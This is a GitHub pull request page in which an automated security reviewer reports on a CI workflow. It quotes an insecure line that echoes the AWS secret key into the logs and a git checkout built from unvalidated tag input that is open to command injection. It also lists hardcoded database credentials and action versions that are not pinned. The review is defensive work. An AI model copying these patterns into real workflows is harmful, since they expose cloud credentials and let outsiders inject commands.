You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
This pull request contains multiple critical security vulnerabilities, including hardcoded PostgreSQL credentials, exposed AWS secret keys in workflow logs, potential command injection through unvalidated tag input, and the use of GitHub Actions without pinned commit hashes, which could lead to supply chain attacks.
✨ Code Policies (3)
Policy
hardcoded-creds
Result
Yes, the change includes hard-coded credentials in the postgres service configuration within the test job. Specifically, it contains hard-coded values for POSTGRES_USER: 'postgres' and POSTGRES_PASSWORD: 'postgres', as well as these same credentials in the DATABASE_URL environment variable. Guidance: refer issues to the security team
Policy
GitHub Actions Security Policy
Result
Yes, this GitHub Actions workflow has multiple security issues: 1. Line 83: Direct exposure of AWS secret via echo command: echo "AWS secret key is ${{ secrets.AWS_SECRET_ACCESS_KEY }}" 2. Lines 85-87: Command injection vulnerability via unsanitized tag input: git checkout ${{ github.event.inputs.tag }} The workflow_dispatch input 'tag' is used directly in a git command without validation 3. Multiple third-party actions used without pinned commit hashes: - Line 29: actions/checkout@v4 - Line 32: ruby/setup-ruby@v1 - Line 71: actions/cache@v3 - Line 142: slackapi/slack-github-action@v1 Using version tags instead of commit hashes allows for potential supply chain attacks if the action is compromised 4. Line 41: Checkout of private repo using GH_TOKEN secret: While not inherently unsafe, the token permissions should be restricted to minimum required access
Policy
test-check
Result
Yes, there is a concerning logging issue in the GitHub workflow file. On line 85, there is an explicit logging of an AWS secret access key using 'echo "AWS secret key is ${{ secrets.AWS_SECRET_ACCESS_KEY }}"'. This logs a sensitive credential directly to the workflow logs, which is a serious security risk as it could expose AWS access credentials. Guidance: bad code
💭 Unconfirmed Findings (2)
Vulnerability
Potential Command Injection via Unvalidated Tag Input
Description
A security vulnerability in the GitHub Actions workflow where user-provided tag input can be used to inject arbitrary commands or checkout unintended branches/commits. Located in .github/workflows/main.yaml, this poses a significant risk of command injection due to lack of proper input validation.
Vulnerability
Secret Exposure in Workflow Logs
Description
A critical security issue where sensitive AWS credentials are explicitly printed to GitHub Actions logs, potentially exposing confidential authentication information to unauthorized parties. This vulnerability is located in .github/workflows/main.yaml and could lead to unauthorized access to AWS resources.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
No description provided.